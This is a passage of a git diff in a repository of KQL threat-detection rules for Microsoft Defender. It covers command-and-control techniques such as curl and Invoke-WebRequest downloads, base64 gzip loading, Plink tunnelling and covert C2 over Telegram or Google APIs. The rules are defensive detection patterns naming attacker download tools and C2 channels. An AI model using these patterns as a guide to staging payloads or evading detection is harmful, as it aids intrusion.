contains "—config" or ProcessCommandLine contains "―config") and (ProcessCommandLine contains "-Post" or ProcessCommandLine contains "/Post" or ProcessCommandLine contains "–Post" or ProcessCommandLine contains "—Post" or ProcessCommandLine contains "―Post") and ProcessCommandLine contains "http" and (FolderPath endswith "\\certreq.exe" or ProcessVersionInfoOriginalFileName =~ "CertReq.exe") \ No newline at end of file 
diff --git a/KQL/rules/Command and Control/suspicious_child_process_of_manage_engine_servicedesk.kql b/KQL/rules/Command and Control/suspicious_child_process_of_manage_engine_servicedesk.kql index bad8158b..56caf330 100644 --- a/KQL/rules/Command and Control/suspicious_child_process_of_manage_engine_servicedesk.kql +++ b/KQL/rules/Command and Control/suspicious_child_process_of_manage_engine_servicedesk.kql 
@@ -1,12 +1,12 @@
-// Title: Suspicious Child Process Of Manage Engine ServiceDesk
-// Author: Florian Roth (Nextron Systems)
-// Date: 2023-01-18
-// Level: high
-// Description: Detects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1102
-// False Positives:
-// - Legitimate sub processes started by Manage Engine ServiceDesk Pro
-
-DeviceProcessEvents
+// Title: Suspicious Child Process Of Manage Engine ServiceDesk
+// Author: Florian Roth (Nextron Systems)
+// Date: 2023-01-18
+// Level: high
+// Description: Detects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1102
+// False Positives:
+// - Legitimate sub processes started by Manage Engine ServiceDesk Pro
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\calc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and (InitiatingProcessFolderPath contains "\\ManageEngine\\ServiceDesk\\" and InitiatingProcessFolderPath contains "\\java.exe")) and
(not((ProcessCommandLine contains " stop" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_curl_change_user_agents_linux.kql b/KQL/rules/Command and Control/suspicious_curl_change_user_agents_linux.kql
index 6cc4fb27..9cb0a989 100644
--- a/KQL/rules/Command and Control/suspicious_curl_change_user_agents_linux.kql
+++ b/KQL/rules/Command and Control/suspicious_curl_change_user_agents_linux.kql
@@ -1,13 +1,13 @@
-// Title: Suspicious Curl Change User Agents - Linux
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-15
-// Level: medium
-// Description: Detects a suspicious curl process start on linux with set useragent options
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1071.001
-// False Positives:
-// - Scripts created by developers and admins
-// - Administrative activity
-
-DeviceProcessEvents
+// Title: Suspicious Curl Change User Agents - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-15
+// Level: medium
+// Description: Detects a suspicious curl process start on linux with set useragent options
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1071.001
+// False Positives:
+// - Scripts created by developers and admins
+// - Administrative activity
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -A " or ProcessCommandLine contains " --user-agent ") and FolderPath endswith "/curl"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_curl_exe_download.kql b/KQL/rules/Command and Control/suspicious_curl_exe_download.kql
index c2c540d7..de61ac2f 100644
--- a/KQL/rules/Command and Control/suspicious_curl_exe_download.kql
+++ b/KQL/rules/Command and Control/suspicious_curl_exe_download.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Curl.EXE Download
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020-07-03
-// Level: high
-// Description: Detects a suspicious curl process start on Windows and outputs the requested document to a local file
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105
-
-DeviceProcessEvents
+// Title: Suspicious Curl.EXE Download
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-07-03
+// Level: high
+// Description: Detects a suspicious curl process start on Windows and outputs the requested document to a local file
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable") and ((ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpg" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".temp" or ProcessCommandLine endswith ".tmp" or ProcessCommandLine endswith ".txt" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbs") or (ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Public%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "C:\\PerfLogs\\" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\")) and (not(((ProcessCommandLine contains "--silent --show-error --output " and ProcessCommandLine contains "gfw-httpget-" and ProcessCommandLine contains "AppData") and FolderPath =~ "C:\\Program
Files\\Git\\mingw64\\bin\\curl.exe" and InitiatingProcessFolderPath =~ "C:\\Program Files\\Git\\usr\\bin\\sh.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_desktopimgdownldr_command.kql b/KQL/rules/Command and Control/suspicious_desktopimgdownldr_command.kql
index 412c5335..c8977ed0 100644
--- a/KQL/rules/Command and Control/suspicious_desktopimgdownldr_command.kql
+++ b/KQL/rules/Command and Control/suspicious_desktopimgdownldr_command.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Desktopimgdownldr Command
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020-07-03
-// Level: high
-// Description: Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105
-// False Positives:
-// - False positives depend on scripts and administrative tools used in the monitored environment
-
-DeviceProcessEvents
+// Title: Suspicious Desktopimgdownldr Command
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-07-03
+// Level: high
+// Description: Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " /lockscreenurl:" and (not((ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".png")))) or (ProcessCommandLine contains "reg delete" and ProcessCommandLine contains "\\PersonalizationCSP")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_desktopimgdownldr_target_file.kql b/KQL/rules/Command and Control/suspicious_desktopimgdownldr_target_file.kql
index 819ffe34..eab18902 100644
--- a/KQL/rules/Command and Control/suspicious_desktopimgdownldr_target_file.kql
+++ b/KQL/rules/Command and Control/suspicious_desktopimgdownldr_target_file.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Desktopimgdownldr Target File
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020-07-03
-// Level: high
-// Description: Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105
-// False Positives:
-// - False positives depend on scripts and administrative tools used in the monitored environment
-
-DeviceFileEvents
+// Title: Suspicious Desktopimgdownldr Target File
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-07-03
+// Level: high
+// Description: Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceFileEvents
 | where (InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath contains "\\Personalization\\LockScreenImage\\") and (not(FolderPath contains "C:\\Windows\\")) and (not((FolderPath contains ".jpg" or FolderPath contains ".jpeg" or FolderPath contains ".png")))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_diantz_download_and_compress_into_a_cab_file.kql b/KQL/rules/Command and Control/suspicious_diantz_download_and_compress_into_a_cab_file.kql
index 5e9fd847..a5e27b99 100644
--- a/KQL/rules/Command and Control/suspicious_diantz_download_and_compress_into_a_cab_file.kql
+++ b/KQL/rules/Command and Control/suspicious_diantz_download_and_compress_into_a_cab_file.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Diantz Download and Compress Into a CAB File
-// Author: frack113
-// Date: 2021-11-26
-// Level: medium
-// Description: Download and compress a remote file and store it in a cab file on local machine.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105
-
-DeviceProcessEvents
+// Title: Suspicious Diantz Download and Compress Into a CAB File
+// Author: frack113
+// Date: 2021-11-26
+// Level: medium
+// Description: Download and compress a remote file and store it in a cab file on local machine.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "diantz.exe" and ProcessCommandLine contains " \\\\" and ProcessCommandLine contains ".cab"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_download_from_office_domain.kql b/KQL/rules/Command and Control/suspicious_download_from_office_domain.kql
index 1b0969d9..eae00681 100644
--- a/KQL/rules/Command and Control/suspicious_download_from_office_domain.kql
+++ b/KQL/rules/Command and Control/suspicious_download_from_office_domain.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Download from Office Domain
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021-12-27
-// Level: high
-// Description: Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.resource-development, attack.t1105, attack.t1608
-// False Positives:
-// - Scripts or tools that download attachments from these domains (OneNote, Outlook 365)
-
-DeviceProcessEvents
+// Title: Suspicious Download from Office Domain
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-27
+// Level: high
+// Description: Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.resource-development, attack.t1105, attack.t1608
+// False Positives:
+// - Scripts or tools that download attachments from these domains (OneNote, Outlook 365)
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "https://attachment.outlook.live.net/owa/" or ProcessCommandLine contains "https://onenoteonlinesync.onenote.com/onenoteonlinesync/") and ((FolderPath endswith "\\curl.exe" or FolderPath endswith "\\wget.exe") or (ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "curl " or ProcessCommandLine contains "wget " or ProcessCommandLine contains "Start-BitsTransfer" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains ".DownloadString("))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_dropbox_api_usage.kql b/KQL/rules/Command and Control/suspicious_dropbox_api_usage.kql
index 9f87de9e..06615ead 100644
--- a/KQL/rules/Command and Control/suspicious_dropbox_api_usage.kql
+++ b/KQL/rules/Command and Control/suspicious_dropbox_api_usage.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Dropbox API Usage
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-04-20
-// Level: high
-// Description: Detects an executable that isn't dropbox but communicates with the Dropbox API
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.exfiltration, attack.t1105, attack.t1567.002
-// False Positives:
-// - Legitimate use of the API with a tool that the author wasn't aware of
-
-DeviceNetworkEvents
+// Title: Suspicious Dropbox API Usage
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-20
+// Level: high
+// Description: Detects an executable that isn't dropbox but communicates with the Dropbox API
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.exfiltration, attack.t1105, attack.t1567.002
+// False Positives:
+// - Legitimate use of the API with a tool that the author wasn't aware of
+
+DeviceNetworkEvents
 | where (RemoteUrl endswith "api.dropboxapi.com" or RemoteUrl endswith "content.dropboxapi.com") and (not(InitiatingProcessFolderPath contains "\\Dropbox"))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_extrac32_execution.kql b/KQL/rules/Command and Control/suspicious_extrac32_execution.kql
index 5a108eba..4c2c37b6 100644
--- a/KQL/rules/Command and Control/suspicious_extrac32_execution.kql
+++ b/KQL/rules/Command and Control/suspicious_extrac32_execution.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Extrac32 Execution
-// Author: frack113
-// Date: 2021-11-26
-// Level: medium
-// Description: Download or Copy file with Extrac32
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105
-
-DeviceProcessEvents
+// Title: Suspicious Extrac32 Execution
+// Author: frack113
+// Date: 2021-11-26
+// Level: medium
+// Description: Download or Copy file with Extrac32
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
 | where ProcessCommandLine contains ".cab" and (ProcessCommandLine contains "extrac32.exe" or FolderPath endswith "\\extrac32.exe" or ProcessVersionInfoOriginalFileName =~ "extrac32.exe") and (ProcessCommandLine contains "/C" or ProcessCommandLine contains "/Y" or ProcessCommandLine contains " \\\\")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql b/KQL/rules/Command and Control/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql
index 675095d1..5f086383 100644
--- a/KQL/rules/Command and Control/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql
+++ b/KQL/rules/Command and Control/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious FromBase64String Usage On Gzip Archive - Process Creation
-// Author: frack113
-// Date: 2022-12-23
-// Level: medium
-// Description: Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1132.001
-// False Positives:
-// - Legitimate administrative script
-
-DeviceProcessEvents
+// Title: Suspicious FromBase64String Usage On Gzip Archive - Process Creation
+// Author: frack113
+// Date: 2022-12-23
+// Level: medium
+// Description: Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1132.001
+// False Positives:
+// - Legitimate administrative script
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "FromBase64String" and ProcessCommandLine contains "MemoryStream" and ProcessCommandLine contains "H4sI"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution.kql b/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution.kql
index d94a68cc..6fb90d3f 100644
--- a/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution.kql
+++ b/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Invoke-WebRequest Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-02
-// Level: high
-// Description: Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105
-
-DeviceProcessEvents
+// Title: Suspicious Invoke-WebRequest Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-02
+// Level: high
+// Description: Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "curl " or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget ") and (ProcessCommandLine contains " -ur" or ProcessCommandLine contains " -o") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell_ise.EXE", "PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Public%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains ":\\Windows\\")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution_with_directip.kql b/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution_with_directip.kql
index 4ab6508c..b41eb155 100644
--- a/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution_with_directip.kql
+++ b/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution_with_directip.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Invoke-WebRequest Execution With DirectIP
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-04-21
-// Level: medium
-// Description: Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105
-
-DeviceProcessEvents
+// Title: Suspicious Invoke-WebRequest Execution With DirectIP
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-21
+// Level: medium
+// Description: Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "curl " or ProcessCommandLine contains "Invoke-RestMethod" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains " irm " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget ") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell_ise.EXE", "PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_mstsc_exe_execution_with_local_rdp_file.kql b/KQL/rules/Command and Control/suspicious_mstsc_exe_execution_with_local_rdp_file.kql
index d7490876..da71f0ab 100644
--- a/KQL/rules/Command and Control/suspicious_mstsc_exe_execution_with_local_rdp_file.kql
+++ b/KQL/rules/Command and Control/suspicious_mstsc_exe_execution_with_local_rdp_file.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Mstsc.EXE Execution With Local RDP File
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-04-18
-// Level: high
-// Description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1219.002
-// False Positives:
-// - Likelihood is related to how often the paths are used in the environment
-
-DeviceProcessEvents
+// Title: Suspicious Mstsc.EXE Execution With Local RDP File
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-18
+// Level: high
+// Description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Likelihood is related to how often the paths are used in the environment
+
+DeviceProcessEvents
 | where (ProcessCommandLine endswith ".rdp" or ProcessCommandLine endswith ".rdp\"") and (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe") and (ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\drivers\\color" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks_Migrated " or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Tracing\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Downloads\\")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_google_api.kql b/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_google_api.kql
index a919392d..bc7155c4 100644
--- a/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_google_api.kql
+++ b/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_google_api.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Non-Browser Network Communication With Google API
-// Author: Gavin Knapp
-// Date: 2023-05-01
-// Level: medium
-// Description: Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1102
-// False Positives:
-// - Legitimate applications communicating with the "googleapis.com" endpoints that are not already in the exclusion list. This is environmental dependent and requires further testing and tuning.
-
-DeviceNetworkEvents
+// Title: Suspicious Non-Browser Network Communication With Google API
+// Author: Gavin Knapp
+// Date: 2023-05-01
+// Level: medium
+// Description: Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1102
+// False Positives:
+// - Legitimate applications communicating with the "googleapis.com" endpoints that are not already in the exclusion list. This is environmental dependent and requires further testing and tuning.
+
+DeviceNetworkEvents
 | where (RemoteUrl contains "drive.googleapis.com" or RemoteUrl contains "oauth2.googleapis.com" or RemoteUrl contains "sheets.googleapis.com" or RemoteUrl contains "www.googleapis.com") and (not((InitiatingProcessFolderPath =~ "" or isnull(InitiatingProcessFolderPath)))) and (not((InitiatingProcessFolderPath endswith "\\brave.exe" or (InitiatingProcessFolderPath endswith ":\\Program Files\\Google\\Chrome\\Application\\chrome.exe" or InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe") or (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or (InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe")) or ((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft\\EdgeCore\\") and (InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe")) or (InitiatingProcessFolderPath endswith ":\\Program Files\\Mozilla Firefox\\firefox.exe" or InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Mozilla Firefox\\firefox.exe") or (InitiatingProcessFolderPath contains ":\\Program Files\\Google\\Drive File Stream\\" and InitiatingProcessFolderPath endswith "\\GoogleDriveFS.exe") or InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe" or (InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Internet Explorer\\iexplore.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Internet Explorer\\iexplore.exe") or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith
"\\outlook.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_telegram_api.kql b/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_telegram_api.kql
index 9eeb953e..9fbe84a1 100644
--- a/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_telegram_api.kql
+++ b/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_telegram_api.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Non-Browser Network Communication With Telegram API
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-19
-// Level: medium
-// Description: Detects an a non-browser process interacting with the Telegram API which could indicate use of a covert C2
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.exfiltration, attack.t1102, attack.t1567, attack.t1105
-// False Positives:
-// - Legitimate applications communicating with the Telegram API e.g. web browsers not in the exclusion list, app with an RSS etc.
-
-DeviceNetworkEvents
+// Title: Suspicious Non-Browser Network Communication With Telegram API
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-19
+// Level: medium
+// Description: Detects an a non-browser process interacting with the Telegram API which could indicate use of a covert C2
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.exfiltration, attack.t1102, attack.t1567, attack.t1105
+// False Positives:
+// - Legitimate applications communicating with the Telegram API e.g. web browsers not in the exclusion list, app with an RSS etc.
+
+DeviceNetworkEvents
 | where RemoteUrl contains "api.telegram.org" and (not((InitiatingProcessFolderPath endswith "\\brave.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_plink_port_forwarding.kql b/KQL/rules/Command and Control/suspicious_plink_port_forwarding.kql
index 9930d2d0..d1f4c7e6 100644
--- a/KQL/rules/Command and Control/suspicious_plink_port_forwarding.kql
+++ b/KQL/rules/Command and Control/suspicious_plink_port_forwarding.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Plink Port Forwarding
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-01-19
-// Level: high
-// Description: Detects suspicious Plink tunnel port forwarding to a local port
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1572, attack.lateral-movement, attack.t1021.001
-// False Positives:
-// - Administrative activity using a remote port forwarding to a local port
-
-DeviceProcessEvents
+// Title: Suspicious Plink Port Forwarding
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-01-19
+// Level: high
+// Description: Detects suspicious Plink tunnel port forwarding to a local port
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572, attack.lateral-movement, attack.t1021.001
+// False Positives:
+// - Administrative activity using a remote port forwarding to a local port
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " -R " and ProcessVersionInfoFileDescription =~ "Command-line SSH, Telnet, and Rlogin client"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/suspicious_tscon_start_as_system.kql b/KQL/rules/Command and Control/suspicious_tscon_start_as_system.kql
index ec8162c5..ad3db279 100644
--- a/KQL/rules/Command and Control/suspicious_tscon_start_as_system.kql
+++ b/KQL/rules/Command and Control/suspicious_tscon_start_as_system.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious TSCON Start as SYSTEM
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018-03-17
